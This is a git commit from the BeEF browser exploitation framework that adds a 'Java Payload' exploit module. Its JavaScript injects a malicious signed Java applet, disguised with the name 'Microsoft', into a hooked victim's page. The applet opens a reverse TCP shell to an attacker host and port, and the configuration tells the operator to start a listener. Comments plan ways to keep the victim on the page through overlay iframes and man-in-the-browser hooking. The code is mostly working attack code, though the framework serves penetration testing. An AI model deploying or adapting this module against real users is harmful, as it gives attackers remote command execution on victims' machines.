(Fixes issue 434) First works with the malicious Java applet. Tons of work to come in the next releases (OMG) :-)

git-svn-id: https://beef.googlecode.com/svn/trunk@1387 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-11-01 12:06:58 +00:00
parent 8074443730
commit c4d5b30b60
5 changed files with 117 additions and 0 deletions
--- a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar
+++ b/modules/exploits/java_payload/AppletReverseTCP-0.2.jar
--- a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar
+++ b/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar
--- a/modules/exploits/java_payload/command.js
+++ b/modules/exploits/java_payload/command.js
@@ -0,0 +1,54 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+    var conn = '<%= @conn %>';
+    var cbHost = '<%= @cbHost %>';
+    var cbPort = '<%= @cbPort %>';
+    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
+    var applet_id = '<%= @applet_id %>';
+    var applet_name = '<%= @applet_name %>';
+
+    beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
+        applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
+
+
+    //TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
+    //TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.
+
+
+//TODO:     =========== persistence techniques ===========
+//    the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
+//    download platform dependent executable (i.e. meterpreter) and then kill the applet.
+//    we have 2 options:
+//    1. use the MITB code (currently doesn't work on IE)
+//    2. create an overlay iFrame while having the applet runnin in the background
+//
+//    1. setTimeout(beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
+//    2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
+//		var MITBload = setInterval(function(){
+//				if(beef.pageIsLoaded){
+//					clearInterval(MITBload);
+//					beef.mitb.hook();
+//				}
+//			}, 100);
+
+
+
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');
+
+
+});
--- a/modules/exploits/java_payload/config.yaml
+++ b/modules/exploits/java_payload/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        java_payload:
+            enable: true
+            category: "Exploits"
+            name: "Java Payload"
+            description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br/>Before launching it, be sure to have the JavaPayload StagerHandler listening<br/>, i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <PORT> -- JSh"
+            authors: ["antisnatchor"]
+            target:
+                not_working: ["FF"]
+                user_notify: ["All"]
--- a/modules/exploits/java_payload/module.rb
+++ b/modules/exploits/java_payload/module.rb
@@ -0,0 +1,37 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Java_payload < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+  end
+
+
+  def self.options
+    return [
+        {'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
+        {'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => '192.168.56.1'},
+        {'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'},
+        {'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)},
+        {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end